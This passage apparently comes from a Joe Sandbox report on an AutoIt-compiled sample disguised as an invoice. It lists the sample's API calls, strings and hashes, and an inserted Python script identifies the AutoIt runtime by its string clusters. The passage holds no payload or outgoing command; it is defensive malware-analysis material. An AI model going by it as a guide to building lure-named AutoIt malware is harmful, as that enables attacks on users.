                                                              • Instruction Fuzzy Hash: 16B1C070618301EFDB00DF64E848B6ABBE5FF88311F00891DF9899B291D770E818CB96
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00236CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00236D21
                                                              • _wcscpy.LIBCMT ref: 00236D4F
                                                              • _wcscmp.LIBCMT ref: 00236D5A
                                                              • _wcscat.LIBCMT ref: 00236D70
                                                              • _wcsstr.LIBCMT ref: 00236D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00236D97
                                                              • _wcscat.LIBCMT ref: 00236DE0
                                                              • _wcscat.LIBCMT ref: 00236DE7
                                                              • _wcsncpy.LIBCMT ref: 00236E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 18444c465b2d53a69818004464f2ab54797ff6663318f6ee02951ea95c3dbc0b
                                                              • Instruction ID: c3e859bc57e995d92734066ff91cecca94b4dcd98b65fdc2073f3b103b7d55d5
                                                              • Opcode Fuzzy Hash: 18444c465b2d53a69818004464f2ab54797ff6663318f6ee02951ea95c3dbc0b
                                                              • Instruction Fuzzy Hash: EC41F671520205BBEB00AB64CD47EBF77BCEF51710F144016F901A61C2EFB49A759AA1
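The string clusters in the records above (the drive-type names beside GetDriveTypeW, the "#include" / "#requireadmin" / "#OnAutoItStartRegister" directive parser, the upper-cased GUI control commands, the ACTIVE/REGEXPCLASS/REGEXPTITLE window-match modes, and the "\VarFileInfo\Translation" version query) are the interpreter's own runtime, not the payload. A triage script can confirm that a dump like process 2's image region belongs to a compiled AutoIt stub by looking for several of these wide strings together rather than for any single one. The following is an added example, not Joe Sandbox code or output: the marker lists are copied from the String ID fields above, the cluster thresholds and the sample byte blobs are constructed assumptions.

```python
"""Identify an embedded AutoIt interpreter stub in a memory dump by its
runtime string clusters. Added example; marker strings come from the
function records above, thresholds and sample blobs are constructed."""
import re

# Marker strings copied from the "String ID" fields of the records above,
# grouped by the runtime routine each record belongs to.
MARKERS = {
    "drive_type_names":   ["PhysicalDrive", "RAMDisk", "FileBackedVirtual",
                           "iSCSI", "Removable"],
    "script_directives":  ["#OnAutoItStartRegister", "#include-once",
                           "#requireadmin", "#notrayicon", "#pragma compile"],
    "gui_ctrl_commands":  ["HIDEDROPDOWN", "SETCURRENTSELECTION", "SENDCOMMANDID",
                           "GETCURRENTSELECTION", "TABLEFT"],
    "win_handle_modes":   ["REGEXPCLASS", "REGEXPTITLE", "INSTANCE", "ACTIVE"],
    "file_version_query": ["\\VarFileInfo\\Translation", "DefaultLangCodepage",
                           "StringFileInfo\\"],
}

# Printable ASCII encoded as UTF-16LE, at least four characters long.
WIDE_STRING_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def wide_strings(data):
    """Return the set of printable UTF-16LE strings (>= 4 chars) in a blob."""
    return {m.group().decode("utf-16-le") for m in WIDE_STRING_RE.finditer(data)}


def match_clusters(data, min_hits=3):
    """Map cluster name -> markers present in the blob.

    A cluster only counts when at least min_hits of its markers appear, so a
    lone generic word such as "Removable" or "ACTIVE" never triggers by itself.
    Substring matching tolerates markers embedded in longer strings.
    """
    found = wide_strings(data)
    result = {}
    for name, markers in MARKERS.items():
        hits = [mk for mk in markers if any(mk in s for s in found)]
        if len(hits) >= min_hits:
            result[name] = hits
    return result


def runtime_verdict(data, min_clusters=2):
    """Return (is_autoit_stub, clusters). Requiring two independent clusters
    is an assumed threshold; tune it against your own dump corpus."""
    clusters = match_clusters(data)
    return len(clusters) >= min_clusters, clusters


def _w(s):
    """UTF-16LE encode with a wide NUL terminator (helper for the samples)."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed sample: filler bytes around a subset of the marker strings,
# mimicking a dumped interpreter image region.
SAMPLE_RUNTIME = (
    b"\x90" * 16 + _w("\\\\.\\") + _w("PhysicalDrive") + _w("RAMDisk")
    + _w("FileBackedVirtual") + b"\xcc\xcc" + _w("iSCSI")
    + _w("#include-once") + _w("#requireadmin") + _w("#OnAutoItStartRegister")
    + _w("REGEXPCLASS") + _w("REGEXPTITLE") + _w("INSTANCE") + b"\x00" * 8
)

# Constructed decoy: shares only the generic words and must not match.
SAMPLE_DECOY = b"MZ" + _w("Removable") + _w("Fixed") + _w("Network") + _w("ACTIVE")


if __name__ == "__main__":
    for label, blob in (("runtime", SAMPLE_RUNTIME), ("decoy", SAMPLE_DECOY)):
        verdict, clusters = runtime_verdict(blob)
        print(label, "autoit_stub=%s" % verdict, sorted(clusters))
```

The verdict identifies the interpreter, not what it runs: every compiled AutoIt binary, benign or not, carries these strings, so a positive result is the cue to extract and read the embedded script (and to look at the injection and credential-access behaviour recorded elsewhere in this report), not a conviction by itself.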
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020A939
                                                              • GetSystemMetrics.USER32(00000007), ref: 0020A941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020A96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 0020A974
                                                              • GetSystemMetrics.USER32(00000004), ref: 0020A999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0020A9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0020A9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0020A9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0020AA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0020AA2B
                                                              • GetStockObject.GDI32(00000011), ref: 0020AA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0020AA52
                                                                • Part of subcall function 0020B63C: GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                                • Part of subcall function 0020B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,0020AB87), ref: 0020AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00253735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0028DC00,00000000,?,00000000,?,?), ref: 002537A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002537EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00253874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00253B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00253BA1
                                                              Strings
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00256C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00256D16
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022CF91
                                                              • __swprintf.LIBCMT ref: 0022D032
                                                              • _wcscmp.LIBCMT ref: 0022D045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0022D09A
                                                              • _wcscmp.LIBCMT ref: 0022D0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0022D10D
                                                              • GetDlgCtrlID.USER32(?), ref: 0022D15F
                                                              • GetWindowRect.USER32(?,?), ref: 0022D195
                                                              • GetParent.USER32(?), ref: 0022D1B3
                                                              • ScreenToClient.USER32(00000000), ref: 0022D1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022D234
                                                              • _wcscmp.LIBCMT ref: 0022D248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0022D26E
                                                              • _wcscmp.LIBCMT ref: 0022D282
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0022D8EB
                                                              • _wcscmp.LIBCMT ref: 0022D8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0022D924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0022D941
                                                              • _wcscmp.LIBCMT ref: 0022D95F
                                                              • _wcsstr.LIBCMT ref: 0022D970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0022D9A8
                                                              • _wcscmp.LIBCMT ref: 0022D9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0022D9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0022DA28
                                                              • _wcscmp.LIBCMT ref: 0022DA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0022DA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 0022DAC9
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0022EAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0022EAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 0022EAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0022EAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0022EAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0022EB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0022EB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0022EB45
                                                              • GetWindowRect.USER32(?,?), ref: 0022EB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 0022EBB9
                                                              • GetDesktopWindow.USER32 ref: 0022EBBF
                                                              • GetWindowRect.USER32(00000000), ref: 0022EBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0022EC12
                                                              • GetClientRect.USER32(?,?), ref: 0022EC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0022EC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0022EC6F
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 002479C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002479D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 002479DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 002479E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 002479F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 002479FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00247A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00247A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00247A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00247A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00247A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00247A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00247A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00247A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00247A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00247A6B
                                                              • GetCursorInfo.USER32(?), ref: 00247A7B
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 0020E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001FC8B7,?,00002000,?,?,00000000,?,001F419E,?,?,?,0028DC00), ref: 0020E984
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                              • __wsplitpath.LIBCMT ref: 001FC93E
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscpy.LIBCMT ref: 001FC953
                                                              • _wcscat.LIBCMT ref: 001FC968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 001FC978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001FCABE
                                                                • Part of subcall function 001FB337: _wcscpy.LIBCMT ref: 001FB36F
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 2258743419-1018226102
                                                              • Opcode ID: aeaa3506eb8b6e8b6bc74d31372b7e52c0b0a66905bc52857542c2e58180305a
                                                              • Instruction ID: a0d7a046c614e3790f49936463facfdf73fda817110a122cb582958c88292641
                                                              • Opcode Fuzzy Hash: aeaa3506eb8b6e8b6bc74d31372b7e52c0b0a66905bc52857542c2e58180305a
                                                              • Instruction Fuzzy Hash: 7D12D1715183459FC724EF24C981AAFBBE4BF99304F00491EF58993292DB30DA99DF92
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 0025CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0025CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0025D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025D025
                                                              • DestroyWindow.USER32(?), ref: 0025D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001F0000,00000000), ref: 0025D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025D094
                                                              • GetDesktopWindow.USER32 ref: 0025D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 0025D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0025D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0025D0DA
                                                                • Part of subcall function 0020B526: GetWindowLongW.USER32(?,000000EB), ref: 0020B537
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 3877571568-3619404913
                                                              • Opcode ID: 30bb2194109fde94c7bb23a599ccd296a56aa335c60ea562e27cce2824469bed
                                                              • Instruction ID: 9fec259d528d9f2205307b537caa90b2f2162873300d082a9c02071147c8abf4
                                                              • Opcode Fuzzy Hash: 30bb2194109fde94c7bb23a599ccd296a56aa335c60ea562e27cce2824469bed
                                                              • Instruction Fuzzy Hash: 4671CDB0160306AFD724CF28DC88F6677E9EB88704F54451DFA858B2A1D770E866CB16
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0025F37A
                                                                • Part of subcall function 0025D7DE: ClientToScreen.USER32(?,?), ref: 0025D807
                                                                • Part of subcall function 0025D7DE: GetWindowRect.USER32(?,?), ref: 0025D87D
                                                                • Part of subcall function 0025D7DE: PtInRect.USER32(?,?,0025ED5A), ref: 0025D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0025F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0025F411
                                                              • _wcscat.LIBCMT ref: 0025F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0025F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0025F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0025F4AA
                                                              • DragFinish.SHELL32(?), ref: 0025F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0025F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 1e0771f73845443653f89f8b5f5551168eb7754a52aec2c07deecb5d06ad3d42
                                                              • Instruction ID: aa93345a7daa7c1e9674667a8cb3e25ee86d2444576cadd19a5dfc90e6acfe3d
                                                              • Opcode Fuzzy Hash: 1e0771f73845443653f89f8b5f5551168eb7754a52aec2c07deecb5d06ad3d42
                                                              • Instruction Fuzzy Hash: 2F616B71008305AFC311EF60DC89DAFBBF8BF99710F400A1EF695921A1DB709A59CB52
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000000), ref: 0023AB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 0023AB46
                                                              • VariantClear.OLEAUT32(?), ref: 0023AB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0023AC40
                                                              • __swprintf.LIBCMT ref: 0023AC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0023AC9C
                                                              • VariantInit.OLEAUT32(?), ref: 0023AD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 0023ADDF
                                                              • VariantClear.OLEAUT32(?), ref: 0023AE35
                                                              • VariantClear.OLEAUT32(?), ref: 0023AE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 0023AE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: aa09aac711a19a1c6e8baee12d4d2b5ddb4ad590bcf623ac17c984ce0e189a32
                                                              • Instruction ID: 658e9b4372215989eddc03d5c0b057509f38d13fc962dff7e0fa1378d13412e7
                                                              • Opcode Fuzzy Hash: aa09aac711a19a1c6e8baee12d4d2b5ddb4ad590bcf623ac17c984ce0e189a32
                                                              • Instruction Fuzzy Hash: 4CD116B1620206DBCB209F69D885B7EF7B6FF05700F148476E4859B191DBB4EC60DBA2
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 002571FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00257247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 2abd2234c4dc8db0548e86ebe3dbb3852325a8124105efb1e3ab5ff8ef831d13
                                                              • Instruction ID: 9aca21be625839a0c956642b244c4fdb470f6b0d636030f8b2a48fad6933f0cd
                                                              • Opcode Fuzzy Hash: 2abd2234c4dc8db0548e86ebe3dbb3852325a8124105efb1e3ab5ff8ef831d13
                                                              • Instruction Fuzzy Hash: 34919D742283019BCB04EF20D851A6EB7A5BF94310F10485DFD966B3A3DB71ED6ACB85
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0022CF50), ref: 0022CE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: 4+*$CLASS$CLASSNN$H+*$INSTANCE$L+*$NAME$P+*$REGEXPCLASS$T+*$TEXT
                                                              • API String ID: 3555792229-168737517
                                                              • Opcode ID: 254ef6e6a4c52de9063458396b14b694f7998bd72a62ea8900340b088a79bb88
                                                              • Instruction ID: 5e9d9e15d2054ff23e9c915e01bbd49186bb239bc9d0b4dabc8d6957a0eae01c
                                                              • Opcode Fuzzy Hash: 254ef6e6a4c52de9063458396b14b694f7998bd72a62ea8900340b088a79bb88
                                                              • Instruction Fuzzy Hash: 9891A330620216ABDB18DFA0D481BEEFB75BF14304F61851AE949A7191DF7069B9CBE0
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0025E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0025BEAF), ref: 0025E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0025BEAF), ref: 0025E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,0025BEAF), ref: 0025E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0025E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0025E717
                                                                • Part of subcall function 00210FA7: __wcsicmp_l.LIBCMT ref: 00211030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 1d4c84ccd3f3bd9a9f33cb73bebe98324c882ab52044d0560487b5f8a6fee04b
                                                              • Instruction ID: d8c09fac4ef8ccee7b93144d5529ed6518d1eed477e43610c177b18f8fee4b9e
